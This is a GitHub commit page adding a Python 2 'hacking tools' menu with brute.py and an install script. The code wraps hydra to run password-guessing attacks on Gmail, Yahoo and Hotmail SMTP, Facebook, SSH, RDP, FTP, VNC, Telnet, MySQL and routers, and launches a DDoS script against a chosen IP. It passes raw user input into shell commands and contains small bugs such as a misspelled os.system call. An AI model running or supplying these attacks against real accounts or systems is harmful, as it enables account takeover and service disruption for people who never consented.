Skip to content

Commit 41835ad

Browse files
authored
Add files via upload
1 parent 3bfcd4b commit 41835ad

File tree

4 files changed

+646
-0
lines changed

4 files changed

+646
-0
lines changed

Ha3Mrx.py

+51
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
import os, sys, time
2+
from time import sleep as timeout
3+
def restart_program():
4+
python = sys.executable
5+
os.execl(python, python, * sys.argv)
6+
curdir = os.getcwd()
7+
os.system("clear")
8+
os.system("figlet Ha3MrX")
9+
print "Create By : Ha3MrX"
10+
print "YouTube : https://www.youtube.com/c/HA-MRX"
11+
print "github : https://github.com/Ha3MrX"
12+
print "Facebook : https://www.facebook.com/muhamad.jabar222"
13+
print "Website : https://kurdkali.wordpress.com/"
14+
print "Twitter : https://twitter.com/ha_mrx"
15+
print
16+
print " [1]> Brute Force "
17+
print " [2]> DDos Attack "
18+
print " [3]> NMap PortScanner "
19+
print " [4]> Install Tools Hacking "
20+
print
21+
print " [0]> Exit "
22+
print
23+
A = raw_input("Ha3MrX ==>> ")
24+
25+
if A == "1" or A == "01":
26+
os.system("python2 brute.py")
27+
28+
elif A == "2" or A == "02":
29+
os.system("clear")
30+
os.system("figlet DDOS Attack")
31+
ip = raw_input("IP Address : ")
32+
port = raw_input("Port : ")
33+
packet =raw_input("Packet : ")
34+
os.system("python2 pntddos %s %s %s" % (ip, port, packet))
35+
36+
elif A == "3" or A == "03":
37+
os.system("clear")
38+
os.system("figlet NMap Scan")
39+
host = raw_input("Host : ")
40+
os.system("nmap %s" % (host))
41+
42+
elif A == "4" or A == "04":
43+
os.system("python2 lazymux.py")
44+
45+
elif A == "0" or A == "00":
46+
sys.exit()
47+
48+
else:
49+
print "\nERROR: Wrong Input"
50+
timeout(3)
51+
restart_program()

brute.py

+140
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,140 @@
1+
import os, sys, time
2+
from time import sleep as timeout
3+
def restart_program():
4+
python = sys.executable
5+
os.execl(python, python, * sys.argv)
6+
curdir = os.getcwd()
7+
os.system("clear")
8+
os.system("figlet Brute Force")
9+
print
10+
print " [01]> Cisco Brute Force "
11+
print " [02]> VNC Brute Force "
12+
print " [03]> FTP Brute Force "
13+
print " [04]> Gmail Brute Force "
14+
print " [05]> SSH Brute Force "
15+
print " [06]> TeamSpeak Brute Force "
16+
print " [07]> Telnet Brute Force "
17+
print " [08]> Yahoo Mail Brute Force "
18+
print " [09]> Hotmail Brute Force "
19+
print " [10]> Router Speedy Brute Force "
20+
print " [11]> RDP Brute Force "
21+
print " [12]> MySQL Brute Force "
22+
print " [13]> Facebook Brute Force "
23+
print
24+
print " [00]> Exit"
25+
print
26+
bhydra = raw_input("Brute Force Console ==>> ")
27+
28+
if bhydra == '01' or bhydra == '1':
29+
os.system("clear")
30+
os.system("figlet Cisco Brute Force ")
31+
iphost = raw_input("[*] IP/Hostname : ")
32+
word = raw_input("[*] Wordlist : ")
33+
os.system("hydra -P %s %s cisco" % (word, iphost))
34+
sys.exit()
35+
36+
elif bhydra == '02' or bhydra == '2':
37+
os.system("clear")
38+
os.system("figlet VNC Brute Force")
39+
word = raw_input("[*] Wordlist : ")
40+
iphost = raw_input("[*] IP/Hostname : ")
41+
os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost))
42+
iphost = raw_input("[*] IP/Hostname : ")
43+
44+
elif bhydra == '03' or bhydra == '3':
45+
os.system("figlet FTP Brute Force")
46+
user = raw_input("[*] User : ")
47+
iphost = raw_input("[*] IP/Hostname : ")
48+
word = raw_input("[*] Wordlist : ")
49+
os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost))
50+
sys.exit()
51+
52+
elif bhydra == '04' or bhydra == '4':
53+
os.system("clear")
54+
os.system("figlet Gmail Brute Force")
55+
email = raw_input("[*] Email : ")
56+
word = raw_input("[*] Wordlist : ")
57+
os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word))
58+
sys.exit()
59+
60+
elif bhydra == '05' or bhydra == '5':
61+
os.system("clear")
62+
os.system("figlet SSH Brute Force")
63+
user = raw_input("[*] User : ")
64+
word = raw_input("[*] Wordlist : ")
65+
iphost = raw_input("[*] IP/Hostname : ")
66+
os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost))
67+
sys.exit()
68+
69+
elif bhydra == '06' or bhydra == '6':
70+
os.system("clear")
71+
os.system("figlet TeamSpeak Brute Force")
72+
user = raw_input("[*] User : ")
73+
word = raw_input("[*] Wordlist : ")
74+
iphost = raw_input("[*] IP/Hostname : ")
75+
os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost))
76+
sys.exit()
77+
78+
elif bhydra == '07' or bhydra == '7':
79+
os.system("clear")
80+
os.system("figlet Telnet Brute Force")
81+
user = raw_input("[*] User : ")
82+
word = raw_input("[*] Wordlist : ")
83+
iphost = raw_input("[*] IP/Hostname : ")
84+
os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost))
85+
sys.exit()
86+
87+
elif bhydra == '08' or bhydra == '8':
88+
os.system("clear")
89+
os.system("Yahoo Brute Force")
90+
email = raw_input("[*] Email : ")
91+
word = raw_input("[*] Wordlist : ")
92+
os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word))
93+
sys.exit()
94+
95+
elif bhydra == '09' or bhydra == '9':
96+
os.system("clear")
97+
os.system("figlet Hotmail Brute Force")
98+
email = raw_input("[*] Email : ")
99+
word = raw_input("[*] Wordlist : ")
100+
os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word))
101+
sys.exit()
102+
103+
elif bhydra == '10':
104+
os.system("clear")
105+
os.system("figlet Router Speedy Brute Force")
106+
user = raw_input("[*] User : ")
107+
word = raw_input("[*] Wordlist : ")
108+
iphost = raw_input("[*] IP/Hostname : ")
109+
os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost))
110+
sys.exit()
111+
112+
elif bhydra == '11':
113+
os.system("clear")
114+
os.system("figlet PDR Brute Force")
115+
user = raw_input("[*] User : ")
116+
word = raw_input("[*] Wordlist : ")
117+
iphost = raw_input("[*] IP/Hostname : ")
118+
os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost))
119+
sys.exit()
120+
121+
elif bhydra == '12':
122+
os.syatem("clear")
123+
os.system("figlet My SQL Brute Force")
124+
user = raw_input("[*] User : ")
125+
word = raw_input("[*] Wordlist : ")
126+
os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word))
127+
128+
elif bhydra == "13":
129+
os.system("clear")
130+
os.system("figlet Facebook Brute Force")
131+
os.system("python2 facebook")
132+
133+
134+
elif bhydra == '00' or bhydra == '0':
135+
os.system("python2 Ha3MrX.py")
136+
137+
else:
138+
print "\n[!] ERROR : Wrong Input"
139+
time.sleep(1)
140+
restart_program()

install.sh

+9
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
apt-get upgrade && apt-get update
2+
apt-get install git -y
3+
apt-get install python -y && apt-get install python2 -y
4+
apt-get install hydra -y
5+
apt-get install figlet -y
6+
apt-get dist-upgrade
7+
figlet Tools is Installed
8+
echo How to use HPAS1369
9+
echo Command : python2 HPAS1369.py

0 commit comments

Comments
 (0)